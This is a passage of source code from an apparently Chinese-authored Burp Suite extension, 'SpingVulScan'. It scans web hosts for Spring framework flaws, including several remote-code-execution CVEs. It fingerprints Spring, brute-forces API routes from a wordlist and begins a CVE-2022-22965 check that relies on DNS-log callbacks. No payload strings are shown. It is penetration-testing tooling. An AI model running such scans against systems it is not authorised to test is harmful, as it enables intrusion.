burp.IHttpRequestResponse; 5 | import burp.IHttpService; 6 | import burp.IMessageEditor; 7 | import burp.IMessageEditorController; 8 | import java.awt.BorderLayout; 9 | import java.text.SimpleDateFormat; 10 | import java.util.ArrayList; 11 | import java.util.Date; 12 | import java.util.List; 13 | import javax.swing.JPanel; 14 | import javax.swing.JScrollPane; 15 | import javax.swing.JSplitPane; 16 | import javax.swing.JTabbedPane; 17 | import javax.swing.JTable; 18 | import javax.swing.table.AbstractTableModel; 19 | import javax.swing.table.TableModel; 20 | 21 | public class ScanResultsUI extends AbstractTableModel implements IMessageEditorController { 22 | private IBurpExtenderCallbacks callbacks; 23 | private IHttpRequestResponse currentHttp; 24 | private 
IMessageEditor messageRequest; 25 | private IMessageEditor messageResponse; 26 | private List tasks = new ArrayList(); 27 | private JTabbedPane tabs; 28 | private JPanel ScannerUI; 29 | private JSplitPane mainSplitPane; 30 | private JSplitPane httpSplitPane; 31 | private JScrollPane tablePane; 32 | private JTabbedPane requestPane; 33 | private JTabbedPane responsePane; 34 | 35 | public ScanResultsUI(IBurpExtenderCallbacks callbacks, JTabbedPane tabs) { 36 | this.callbacks = callbacks; 37 | this.tabs = tabs; 38 | this.initUI(); 39 | this.tabs.addTab("扫描流量", this.ScannerUI); 40 | } 41 | 42 | public void initUI() { 43 | this.ScannerUI = new JPanel(new BorderLayout()); 44 | this.mainSplitPane = new JSplitPane(0); 45 | this.httpSplitPane = new JSplitPane(1); 46 | this.httpSplitPane.setDividerLocation(0.5D); 47 | ScanResultsUI.Table table = new ScanResultsUI.Table(this); 48 | this.tablePane = new JScrollPane(table); 49 | this.requestPane = new JTabbedPane(); 50 | this.responsePane = new JTabbedPane(); 51 | this.messageRequest = this.callbacks.createMessageEditor(this, false); 52 | this.messageResponse = this.callbacks.createMessageEditor(this, false); 53 | this.requestPane.addTab("Resquest", this.messageRequest.getComponent()); 54 | this.responsePane.addTab("Response", this.messageResponse.getComponent()); 55 | this.httpSplitPane.add(this.requestPane); 56 | this.httpSplitPane.add(this.responsePane); 57 | this.mainSplitPane.add(this.tablePane); 58 | this.mainSplitPane.add(this.httpSplitPane); 59 | this.ScannerUI.add(this.mainSplitPane); 60 | } 61 | 62 | public IHttpService getHttpService() { 63 | return this.currentHttp.getHttpService(); 64 | } 65 | 66 | public byte[] getRequest() { 67 | return this.currentHttp.getRequest(); 68 | } 69 | 70 | public byte[] getResponse() { 71 | return this.currentHttp.getResponse(); 72 | } 73 | 74 | public int getRowCount() { 75 | return this.tasks.size(); 76 | } 77 | 78 | public int getColumnCount() { 79 | return 8; 80 | } 81 | 82 | public 
Object getValueAt(int rowIndex, int columnIndex) {
83 | ScanResultsUI.TableData data = (ScanResultsUI.TableData)this.tasks.get(rowIndex);
84 | /* Column order must match getColumnName(); column 0 is the int id (auto-boxed to Integer). */
switch(columnIndex) {
85 | case 0:
86 | return data.id;
87 | case 1:
88 | return data.checkMethod;
89 | case 2:
90 | return data.requestMethod;
91 | case 3:
92 | return data.url;
93 | case 4:
94 | return data.status_code;
95 | case 5:
96 | return data.issue;
97 | case 6:
98 | return data.startTime;
99 | case 7:
100 | return data.endTime;
101 | default:
102 | return null;
103 | }
104 | }
105 |
106 | /* Header captions for the eight columns served by getValueAt(). */
public String getColumnName(int column) {
107 | switch(column) {
108 | case 0:
109 | return "#";
110 | case 1:
111 | return "checkMethod";
112 | case 2:
113 | return "requestMethod";
114 | case 3:
115 | return "url";
116 | case 4:
117 | return "status_code";
118 | case 5:
119 | return "issue";
120 | case 6:
121 | return "startTime";
122 | case 7:
123 | return "endTime";
124 | default:
125 | return null;
126 | }
127 | }
128 |
129 | /* NOTE(review): declares every column as String although column 0 yields an Integer; JTable's
   default renderer copes, but a sorter or filter keyed on this class will compare ids as strings. */
public Class getColumnClass(int columnIndex) {
130 | return String.class;
131 | }
132 |
133 | /* Appends a pending row (endTime "") and returns its index, which doubles as the row id used by
   save(). The id is simply tasks.size(), so this only stays consistent as long as rows are never
   removed. A fresh SimpleDateFormat is built per call, so there is no shared-instance thread-safety
   issue. NOTE(review): fireTableRowsInserted runs on the caller's (scanner) thread; Swing model
   events are expected on the EDT — consider SwingUtilities.invokeLater. */
public int add(String extensionMethod, String requestMethod, String url, String statusCode, String issue, IHttpRequestResponse requestResponse) {
134 | synchronized(this.tasks) {
135 | Date date = new Date();
136 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
137 | String startTime = sdf.format(date);
138 | int id = this.tasks.size();
139 | this.tasks.add(new ScanResultsUI.TableData(id, url, statusCode, requestMethod, extensionMethod, issue, startTime, "", requestResponse));
140 | this.fireTableRowsInserted(id, id);
141 | return id;
142 | }
143 | }
144 |
145 | /* Replaces row id with the final verdict, keeping the original startTime and stamping endTime.
   NOTE(review): tasks.get(id) below runs outside the synchronized block that add() uses, so it can
   race with a concurrent insert; move the lookup inside the block. */
public int save(int id, String extensionMethod, String requestMethod, String url, String statusCode, String issue, IHttpRequestResponse requestResponse) {
146 | ScanResultsUI.TableData dataEntry = (ScanResultsUI.TableData)this.tasks.get(id);
147 | String startTime = dataEntry.startTime;
148 | Date d = new Date();
149 |
SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 150 | String endTime = sdf.format(d); 151 | synchronized(this.tasks) { 152 | this.tasks.set(id, new ScanResultsUI.TableData(id, url, statusCode, requestMethod, extensionMethod, issue, startTime, endTime, requestResponse)); 153 | this.fireTableRowsUpdated(id, id); 154 | return id; 155 | } 156 | } 157 | 158 | private static class TableData { 159 | final int id; 160 | final String url; 161 | final String status_code; 162 | final String requestMethod; 163 | final String checkMethod; 164 | final String issue; 165 | final String startTime; 166 | final String endTime; 167 | final IHttpRequestResponse iHttpRequestResponse; 168 | 169 | public TableData(int id, String url, String status_code, String method, String checkMethod, String issue, String startTime, String endTime, IHttpRequestResponse iHttpRequestResponse) { 170 | this.id = id; 171 | this.url = url; 172 | this.status_code = status_code; 173 | this.requestMethod = method; 174 | this.checkMethod = checkMethod; 175 | this.issue = issue; 176 | this.startTime = startTime; 177 | this.endTime = endTime; 178 | this.iHttpRequestResponse = iHttpRequestResponse; 179 | } 180 | } 181 | 182 | private class Table extends JTable { 183 | public Table(TableModel dm) { 184 | super(dm); 185 | } 186 | 187 | public void changeSelection(int rowIndex, int columnIndex, boolean toggle, boolean extend) { 188 | ScanResultsUI.TableData data = (ScanResultsUI.TableData)ScanResultsUI.this.tasks.get(this.convertRowIndexToModel(rowIndex)); 189 | ScanResultsUI.this.messageRequest.setMessage(data.iHttpRequestResponse.getRequest(), true); 190 | ScanResultsUI.this.messageResponse.setMessage(data.iHttpRequestResponse.getResponse(), false); 191 | ScanResultsUI.this.currentHttp = data.iHttpRequestResponse; 192 | super.changeSelection(rowIndex, columnIndex, toggle, extend); 193 | } 194 | } 195 | } 196 | -------------------------------------------------------------------------------- 
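/SpingVulScan-1.0/src/main/java/burp/UI/tabs/SettingUI.java:
--------------------------------------------------------------------------------
package burp.UI.tabs;

import burp.IBurpExtenderCallbacks;
import java.awt.Color;
import java.awt.Font;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Locale;
import javax.swing.BoxLayout;
import javax.swing.JCheckBox;
import javax.swing.JComboBox;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JTabbedPane;
import javax.swing.JTextField;
import javax.swing.border.EmptyBorder;

/**
 * The extension's settings tab: which checks are enabled, how scanning is scoped, which callback
 * platform is used and which vulnerability id is selected. The boolean getters and getVulId()/
 * getBackendPlatform() are what the payload classes read at scan time.
 */
public class SettingUI {
    /** Heading colour shared by every section label. */
    private static final Color HEADING_COLOR = new Color(255, 89, 18);

    private IBurpExtenderCallbacks callbacks;
    private JTabbedPane tabs;
    private JTabbedPane reverseTabs;
    private JCheckBox enableCheckBox;
    private JCheckBox errorCheckBox;
    private JCheckBox reverseCheckBox;
    private JCheckBox checkAll;
    private JCheckBox checkSpring;
    private JLabel enableLabel;
    private JLabel checkLabel;
    private JLabel reverseLabel;
    private JLabel scanLabel;
    private JLabel vulId;
    private JPanel backendUI;
    private JTextField othersDnsLog;
    private JComboBox<String> backendSelector;
    private JComboBox<String> vulSelector;

    /** Builds the panel and registers it as the "设置" tab on {@code tabs}. */
    public SettingUI(IBurpExtenderCallbacks callbacks, JTabbedPane tabs) {
        this.callbacks = callbacks;
        this.tabs = tabs;
        this.initUI();
        this.tabs.addTab("设置", this.backendUI);
    }

    /** Builds the panel without registering it anywhere. */
    public SettingUI() {
        this.initUI();
    }

    public JPanel getBackendUI() {
        return this.backendUI;
    }

    /** Creates every widget with its default state (all checks on, first combo entry selected) and lays them out. */
    public void initUI() {
        this.backendUI = new JPanel();
        this.backendUI.setAlignmentX(0.0F);
        this.backendUI.setBorder(new EmptyBorder(0, 0, 0, 0));
        this.backendUI.setLayout(new BoxLayout(this.backendUI, BoxLayout.Y_AXIS));

        this.enableLabel = heading("基础设置:");
        this.scanLabel = heading("扫描类型:");
        this.checkLabel = heading("检测方式:");
        this.reverseLabel = heading("回连平台:");
        this.vulId = heading("检测编号:");

        this.enableCheckBox = new JCheckBox("启动", true);
        this.errorCheckBox = new JCheckBox("回显检测", true);
        this.reverseCheckBox = new JCheckBox("回连检测", true);
        this.checkAll = new JCheckBox("同一站点仅检测一次", true);
        this.checkSpring = new JCheckBox("过滤检测Spring框架流量", true);

        this.vulSelector = fixedWidthCombo(this.getvulIDSelectors());
        this.backendSelector = fixedWidthCombo(this.getbackendSelectors());

        this.reverseTabs = new JTabbedPane();
        this.reverseTabs.addTab("DNSLog Platform", this.getCeyePanel());

        JPanel runPanel = this.GetXPanel();
        runPanel.add(this.enableLabel);
        runPanel.add(this.enableCheckBox);

        JPanel scanPanel = this.GetXPanel();
        scanPanel.add(this.scanLabel);
        scanPanel.add(this.checkAll);
        scanPanel.add(this.checkSpring);

        JPanel checkPanel = this.GetXPanel();
        checkPanel.add(this.checkLabel);
        checkPanel.add(this.errorCheckBox);
        checkPanel.add(this.reverseCheckBox);

        JPanel reversePanel = this.GetXPanel();
        reversePanel.add(this.reverseLabel);
        reversePanel.add(this.backendSelector);

        JPanel vulIdPanel = this.GetXPanel();
        vulIdPanel.add(this.vulId);
        vulIdPanel.add(this.vulSelector);

        JPanel settingPanel = this.GetYPanel();
        settingPanel.add(runPanel);
        settingPanel.add(checkPanel);
        settingPanel.add(scanPanel);
        settingPanel.add(vulIdPanel);

        JPanel reverseInfoPanel = this.GetXPanel();
        reverseInfoPanel.add(reversePanel);
        reverseInfoPanel.add(this.reverseTabs);

        this.backendUI.add(settingPanel);
        this.backendUI.add(reverseInfoPanel);
    }

    /** A section label in the shared heading style: orange, plain Serif, two points larger than the default. */
    private static JLabel heading(String text) {
        JLabel label = new JLabel(text);
        label.setForeground(HEADING_COLOR);
        label.setFont(new Font("Serif", Font.PLAIN, label.getFont().getSize() + 2));
        return label;
    }

    /** A combo box with the first entry selected and its width pinned so BoxLayout does not stretch it. */
    private static JComboBox<String> fixedWidthCombo(String[] items) {
        JComboBox<String> combo = new JComboBox<>(items);
        combo.setSelectedIndex(0);
        combo.setMaximumSize(combo.getPreferredSize());
        return combo;
    }

    /** Panel of the "DNSLog Platform" tab: a free-text field for a DNS log host, prefilled with DnsLog.cn. */
    private JPanel getCeyePanel() {
        JPanel jPanel = new JPanel();
        jPanel.add(new JLabel("可指定请求dns(不支持检测):"));
        this.othersDnsLog = new JTextField("DnsLog.cn", 30);
        jPanel.add(this.othersDnsLog);
        return jPanel;
    }

    /** Left-aligned row panel (default FlowLayout) with a small vertical gap. */
    public JPanel GetXPanel() {
        JPanel panel = new JPanel();
        panel.setAlignmentX(0.0F);
        panel.setBorder(new EmptyBorder(5, 0, 5, 0));
        return panel;
    }

    /** Left-aligned column panel stacking its children top to bottom. */
    public JPanel GetYPanel() {
        JPanel panel = new JPanel();
        panel.setAlignmentX(0.0F);
        panel.setBorder(new EmptyBorder(5, 0, 5, 0));
        panel.setLayout(new BoxLayout(panel, BoxLayout.Y_AXIS));
        return panel;
    }

    /** Names of the Backends constants, in declaration order; getBackendPlatform() maps them back with valueOf. */
    private String[] getbackendSelectors() {
        return Arrays.stream(SettingUI.Backends.values()).map(Enum::name).toArray(String[]::new);
    }

    /** Entries of the vulnerability selector; the chosen text is returned verbatim by getVulId(). */
    private String[] getvulIDSelectors() {
        return new String[] {
            "ALL",
            "爆破路由,API",
            "CVE-2016-4977 Spring Security OAuth2 远程命令执行漏洞",
            "CVE-2017-4971 Spring Web Flow 远程代码执行漏洞(待完善)",
            "CVE-2018-1270 Spring Messaging 远程命令执行漏洞(待完善)",
            "CVE-2018-1273 Spring Data Commons 远程命令执行漏洞(待完善)",
            "CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL表达式注入命令执行",
            "CVE-2022-22963 Spring Cloud Function SpEL表达式命令注入",
            "CVE-2022-22965 Spring Cloud Framework 远程代码执行漏洞"
        };
    }

    public boolean isEnable() {
        return this.enableCheckBox.isSelected();
    }

    public boolean isCheckSpring() {
        return this.checkSpring.isSelected();
    }

    public boolean isCheckAll() {
        return this.checkAll.isSelected();
    }

    public boolean isErrorCheck() {
        return this.errorCheckBox.isSelected();
    }

    public boolean isReverseCheck() {
        return this.reverseCheckBox.isSelected();
    }

    /** The selected entry of the vulnerability combo, exactly as listed by getvulIDSelectors(). */
    public String getVulId() {
        return this.vulSelector.getSelectedItem().toString();
    }

    /** The selected callback platform. */
    public SettingUI.Backends getBackendPlatform() {
        return SettingUI.Backends.valueOf(this.backendSelector.getSelectedItem().toString());
    }

    /** The DNS log host typed by the user, trimmed and lower-cased with Locale.ROOT so the result does not depend on the JVM locale. */
    public String getOtherDnsLog() {
        return this.othersDnsLog.getText().trim().toLowerCase(Locale.ROOT);
    }

    /** Callback platforms the combo offers; the constant name is the visible label. */
    public enum Backends {
        BurpCollaborator,
        DnsLogCn,
        Others;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/auxiliary/CheckIsSpring.java:
--------------------------------------------------------------------------------
package burp.auxiliary;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IRequestInfo;
import java.net.MalformedURLException;
import java.net.URL;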
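import java.util.Iterator;
import java.util.List;
import java.util.Random;

/**
 * Fingerprints whether a host runs Spring by requesting a path that should not exist and looking for
 * Spring Boot's default "Whitelabel Error Page" (or an "unauthorized" body) in the answer.
 */
public class CheckIsSpring {
    /** Alphabet of the random probe suffix: lower-case letters and digits. */
    private static final char[] ALPHANUMERIC = "abcdefghijklmnopqrstuvwxyz0123456789".toCharArray();
    /** Accept header substituted into the probe request. */
    private static final String PROBE_ACCEPT = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8";

    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    /** Shared source of probe suffixes. Not cryptographic, and nothing secret is derived from it. */
    public static Random random = new Random();

    public CheckIsSpring(BurpExtender burpExtender, IExtensionHelpers helpers) {
        this.burpExtender = burpExtender;
        this.helpers = helpers;
    }

    /**
     * Sends one probe request derived from {@code httpRequestResponse} and reports whether the response
     * body looks like a Spring error page.
     *
     * @param flag        text appended to the original URL (or, for 2.x, placed after "actuator/")
     * @param isVersion2x when true the probe goes to {@code <dir>/actuator/<flag><random>} instead of {@code <url><flag>}
     * @return true when the lower-cased body contains "whitelabel error page" or "unauthorized"; false otherwise,
     *         including when the URL could not be built or no response came back
     */
    public boolean isSpring(IHttpRequestResponse httpRequestResponse, String flag, boolean isVersion2x) {
        try {
            IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse);
            IHttpService service = httpRequestResponse.getHttpService();
            String url = requestInfo.getUrl().toString() + flag;
            if (isVersion2x) {
                // Random suffix so the probed path is unlikely to exist and the framework's error handler answers.
                url = this.getUri(url) + "actuator/" + flag + this.randomStr(5);
            }

            byte[] newRequest = this.helpers.buildHttpRequest(new URL(service.getProtocol(), service.getHost(), service.getPort(), url));
            IRequestInfo probeInfo = this.helpers.analyzeRequest(service, newRequest);
            List<String> headers = probeInfo.getHeaders();
            replaceAcceptHeader(headers);
            // Carry the body over by byte offset: substring() on a decoded String would miscount multi-byte characters.
            byte[] body = java.util.Arrays.copyOfRange(newRequest, probeInfo.getBodyOffset(), newRequest.length);
            newRequest = this.helpers.buildHttpMessage(headers, body);

            IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(httpRequestResponse.getHttpService(), newRequest);
            byte[] response = requestResponse.getResponse();
            if (response == null) {
                // No response (timeout / connection failure): nothing to fingerprint.
                return false;
            }
            int bodyOffset = this.helpers.analyzeResponse(response).getBodyOffset();
            String responseBody = new String(response, bodyOffset, response.length - bodyOffset, java.nio.charset.StandardCharsets.UTF_8)
                    .toLowerCase(java.util.Locale.ROOT);
            if (responseBody.contains("whitelabel error page") || responseBody.contains("unauthorized")) {
                this.burpExtender.stdout.println("[*] 存在Spring框架: " + url);
                return true;
            }
        } catch (MalformedURLException e) {
            this.burpExtender.stderr.println(e.getMessage());
        }

        return false;
    }

    /**
     * Swaps the first {@code Accept:} header for PROBE_ACCEPT. Matches the header name only, so
     * Accept-Encoding/Accept-Language are left alone; a request without an Accept header is unchanged.
     */
    private static void replaceAcceptHeader(List<String> headers) {
        Iterator<String> it = headers.iterator();
        while (it.hasNext()) {
            if (it.next().regionMatches(true, 0, "Accept:", 0, 7)) {
                it.remove();
                headers.add(PROBE_ACCEPT);
                return;
            }
        }
    }

    /**
     * Reduces a URL to the directory part of its path with a trailing slash, e.g.
     * {@code http://h/a/b?x=1} becomes {@code /a/}; a URL with no path, or with only a single
     * segment after the host, becomes {@code /}.
     */
    public String getUri(String url) {
        String withoutScheme = url.replace("https://", "").replace("http://", "");
        int query = withoutScheme.indexOf('?');
        String hostAndPath = query >= 0 ? withoutScheme.substring(0, query) : withoutScheme;
        int firstSlash = hostAndPath.indexOf('/');
        if (firstSlash < 0) {
            return "/";
        }
        return hostAndPath.substring(firstSlash, hostAndPath.lastIndexOf('/')) + "/";
    }

    /** Random string of {@code n} characters from ALPHANUMERIC; empty for {@code n <= 0}. */
    public String randomStr(int n) {
        StringBuilder s = new StringBuilder();
        for (int i = 0; i < n; i++) {
            s.append(ALPHANUMERIC[random.nextInt(ALPHANUMERIC.length)]);
        }
        return s.toString();
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/auxiliary/ReadFile.java:
--------------------------------------------------------------------------------
package burp.auxiliary;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

/** Reads a plain-text list (one entry per line) from the path given at construction. */
public class ReadFile {
    private final String filePath;

    /** @param filePath path of the file to read; resolved by the file system, not relative to the jar */
    public ReadFile(String filePath) {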
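this.filePath = filePath;
    }

    /**
     * Reads the whole file into memory as UTF-8 lines, in file order and including duplicates.
     *
     * @return the lines of the file
     * @throws IOException if the file cannot be read
     */
    public List<String> littleFile() throws IOException {
        Path path = Paths.get(this.filePath);
        return Files.readAllLines(path, StandardCharsets.UTF_8);
    }

    /**
     * Streams the file line by line into a set, so duplicates collapse and order is not preserved.
     * Decoded as UTF-8 to match littleFile(); the reader is closed even when reading fails.
     *
     * @return the distinct lines of the file
     * @throws IOException if the file cannot be opened or read
     */
    public Set<String> bigFile() throws IOException {
        Set<String> content = new HashSet<>();
        try (BufferedReader br = new BufferedReader(
                new InputStreamReader(new FileInputStream(new File(this.filePath)), StandardCharsets.UTF_8))) {
            String line;
            while ((line = br.readLine()) != null) {
                content.add(line);
            }
        }
        return content;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/auxiliary/YamlReader.java:
--------------------------------------------------------------------------------
package burp.auxiliary;

import burp.BurpExtender;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.InputStream;
import java.io.UncheckedIOException;
import java.util.HashMap;
import java.util.Map;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;

/**
 * Loads {@code config/config.yml} from the directory containing the extension jar and serves its
 * values by dotted key (e.g. {@code CloudFramework.payloads}).
 */
public class YamlReader {
    private BurpExtender burpExtender;
    /** Parsed document. Static and shared: whichever constructor ran last replaced it. */
    private static Map<String, Object> properties = new HashMap<>();

    /**
     * Loads the config file next to the extension jar.
     *
     * @throws FileNotFoundException if config/config.yml is missing
     */
    public YamlReader(BurpExtender burpExtender) throws FileNotFoundException {
        this.burpExtender = burpExtender;
        // File.separator on both joins so the path also works outside Windows.
        String p = this.getRunFilePath() + "config" + File.separator + "config.yml";
        properties = load(new File(p));
        this.burpExtender.stdout.println(p + " 配置文件加载完毕!");
    }

    /** Development-only constructor with a fixed path from the author's machine; kept for compatibility. */
    public YamlReader() throws FileNotFoundException {
        String p = "E:\\Tools\\burp\\extend开发\\SpingVulScan\\target\\config\\config.yml";
        properties = load(new File(p));
    }

    /**
     * Parses a YAML file into a map and closes the stream afterwards.
     * SafeConstructor limits the document to plain scalars, lists and maps; SnakeYAML's default
     * constructor would let a tagged node in the (user-editable) config file instantiate arbitrary
     * classes. The keys read elsewhere (lists of payload strings) need nothing beyond that.
     *
     * @return the top-level mapping, or an empty map when the document is not a mapping
     * @throws FileNotFoundException if {@code f} does not exist
     * @throws UncheckedIOException if closing the stream fails
     */
    @SuppressWarnings("unchecked")
    private static Map<String, Object> load(File f) throws FileNotFoundException {
        try (InputStream in = new FileInputStream(f)) {
            Object doc = new Yaml(new SafeConstructor()).load(in);
            return doc instanceof Map ? (Map<String, Object>) doc : new HashMap<>();
        } catch (FileNotFoundException e) {
            throw e;
        } catch (IOException e) {
            throw new UncheckedIOException("failed to close " + f, e);
        }
    }

    /**
     * Looks a value up by key. A dotted key walks nested maps segment by segment.
     *
     * @return the value, or {@code null} when a segment is missing or a middle segment is not a map
     */
    public Object getValueByKey(String key) {
        return lookup(properties, key);
    }

    /** The dotted-key walk behind getValueByKey(); package-private so it can be tested without a config file. */
    static Object lookup(Map<String, Object> root, String key) {
        if (!key.contains(".")) {
            return root.get(key);
        }
        Object current = root;
        for (String segment : key.split("\\.")) {
            if (!(current instanceof Map)) {
                return null;
            }
            current = ((Map<?, ?>) current).get(segment);
        }
        return current;
    }

    /** Directory of the loaded extension jar, with a trailing separator. */
    private String getRunFilePath() {
        String extensionFile = this.burpExtender.callbacks.getExtensionFilename();
        int lastIndex = extensionFile.lastIndexOf(File.separator);
        return extensionFile.substring(0, lastIndex) + File.separator;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/Payload.java:
--------------------------------------------------------------------------------
package burp.payload;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IScanIssue;
import burp.DnsLog.DnsLogInterface;
import burp.auxiliary.CheckIsSpring;

/**
 * One vulnerability check. Implementations run the check in doCheckVul() and hand back the
 * request/response that produced the result through export().
 */
public interface Payload {
    // Interface fields are implicitly public static final, so these are always null; every
    // implementation declares private fields of the same names that shadow them. Kept for compatibility.
    BurpExtender burpExtender = null;
    IExtensionHelpers helpers = null;
    CheckIsSpring checkIsSpring = null;
    IHttpRequestResponse updataHttp = null;

    /**
     * Runs the check against the given request.
     *
     * @param var1 the request/response to derive probes from
     * @param var2 callback platform used by checks that wait for an out-of-band lookup
     * @return an issue when the check fired, otherwise {@code null}
     */
    IScanIssue doCheckVul(IHttpRequestResponse var1, DnsLogInterface var2);

    /** The request/response recorded by the last doCheckVul() that fired, or {@code null}. */
    IHttpRequestResponse export();
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/APIunauthorized.java: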
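--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IHttpService;
import burp.IRequestInfo;
import burp.IResponseInfo;
import burp.IScanIssue;
import burp.SpringIssue;
import burp.DnsLog.DnsLogInterface;
import burp.auxiliary.CheckIsSpring;
import burp.auxiliary.ReadFile;
import burp.auxiliary.YamlReader;
import burp.payload.Payload;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.net.URL;
import java.util.Iterator;
import java.util.List;
import java.util.Set;

/**
 * Route-enumeration check: replays the request line against every path listed in
 * {@code config/apiRoute.txt} and reports the first path whose status suggests it exists.
 * Both outcomes are reported as Tentative and are meant for manual confirmation.
 */
public class APIunauthorized implements Payload {
    /** Status codes taken as "this route exists": 200, 302 (redirect), 500 (handler error), 401 (auth required). */
    private static final int[] INTERESTING_STATUS = {200, 302, 500, 401};

    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    private CheckIsSpring checkIsSpring;
    private YamlReader yamlReader;
    private IHttpRequestResponse updataHttp;

    public APIunauthorized(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException {
        this.burpExtender = burpExtender;
        this.helpers = helpers;
        this.checkIsSpring = checkIsSpring;
        this.burpExtender.stdout.println("===========================正在测试是否存在:API未授权,泄露===========================");
        this.yamlReader = new YamlReader(this.burpExtender);
    }

    /** Whether {@code status} is one of INTERESTING_STATUS. */
    static boolean isInteresting(int status) {
        for (int s : INTERESTING_STATUS) {
            if (s == status) {
                return true;
            }
        }
        return false;
    }

    /**
     * Loads the route list from {@code config/apiRoute.txt} next to the extension jar and runs routeBoom().
     * {@code dnsLogPlatform} is unused: this check has no out-of-band part.
     *
     * @return the issue found, or {@code null} when nothing responded or the list could not be read
     */
    public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) {
        // Built with File.separator throughout so the path resolves on every platform, not only Windows.
        String extensionFile = this.burpExtender.callbacks.getExtensionFilename();
        String dir = extensionFile.substring(0, extensionFile.lastIndexOf(File.separator)) + File.separator;
        ReadFile readFile = new ReadFile(dir + "config" + File.separator + "apiRoute.txt");

        try {
            return this.routeBoom(httpRequestResponse, readFile.bigFile(), "");
        } catch (IOException e) {
            this.burpExtender.stderr.println(e.getMessage());
            return null;
        }
    }

    /**
     * Sends {@code GET <flag><route>} for each route, reusing the headers of the original request, and
     * stops at the first response whose status is in INTERESTING_STATUS. Requests without a response
     * are skipped.
     *
     * @param routes paths to try; iteration order is the set's
     * @param flag   prefix placed between "GET " and the route
     * @return Medium/Tentative when the hit carried a recognised MIME type, Low/Tentative otherwise,
     *         {@code null} when no route answered with an interesting status
     */
    public IScanIssue routeBoom(IHttpRequestResponse httpRequestResponse, Set<String> routes, String flag) {
        IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse);
        List<String> headers = requestInfo.getHeaders();
        IHttpService service = httpRequestResponse.getHttpService();
        // Only the method and path of the request line change; the HTTP version stays as sent.
        String version = headers.get(0).contains("HTTP/1.1") ? "HTTP/1.1" : "HTTP/2";

        for (String route : routes) {
            headers.set(0, "GET " + flag + route + " " + version);
            byte[] newRequest = this.helpers.buildHttpMessage(headers, (byte[]) null);
            IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest);
            if (requestResponse.getResponse() == null) {
                continue;
            }
            IResponseInfo responseInfo = this.helpers.analyzeResponse(requestResponse.getResponse());
            if (!isInteresting(responseInfo.getStatusCode())) {
                continue;
            }

            URL url = this.helpers.analyzeRequest(requestResponse).getUrl();
            this.updataHttp = requestResponse;
            if (!responseInfo.getInferredMimeType().equals("")) {
                this.burpExtender.stdout.println("===========================检测完毕!存在:API 未授权 ===========================\n");
                return new SpringIssue(url, "APIunauthorized", 0, "Medium", "Tentative", (String) null, (String) null, "API exists, API leakage is probable, please check manually", (String) null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService());
            }
            this.burpExtender.stdout.println("===========================检测完毕!可能存在:API 未授权 ===========================\n");
            return new SpringIssue(url, "API unauthorized", 0, "Low", "Tentative", (String) null, (String) null, "It is detected that the API burst is echoed, and there may be a route, which needs to be verified by manual test", (String) null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService());
        }

        this.burpExtender.stdout.println("===========================爆破完毕!不存在:API 未授权 ===========================\n");
        return null;
    }

    public IHttpRequestResponse export() {
        return this.updataHttp;
    }
}
--------------------------------------------------------------------------------
/SpingVulScan-1.0/src/main/java/burp/payload/RCE/CloudFramework.java:
--------------------------------------------------------------------------------
package burp.payload.RCE;

import burp.BurpExtender;
import burp.IExtensionHelpers;
import burp.IHttpRequestResponse;
import burp.IParameter;
import burp.IRequestInfo;
import burp.IResponseInfo;
import burp.IScanIssue;
import burp.SpringIssue;
import burp.DnsLog.DnsLogInterface;
import burp.auxiliary.CheckIsSpring;
import burp.auxiliary.YamlReader;
import burp.payload.Payload;
import java.io.FileNotFoundException;
import java.util.List;

/**
 * CVE-2022-22965 check. An echo variant compares the server's status for a marker value against a
 * benign value; a callback variant waits for the DNS-log platform to record a lookup.
 */
public class CloudFramework implements Payload {
    private BurpExtender burpExtender;
    private IExtensionHelpers helpers;
    private CheckIsSpring checkIsSpring;
    private YamlReader yamlReader;
    private DnsLogInterface dnsLogPlatform;
    private IHttpRequestResponse updataHttp;

    public CloudFramework(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException {
        this.burpExtender = burpExtender;
        this.helpers = helpers;
        this.checkIsSpring = checkIsSpring;
        this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Cloud Framework 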
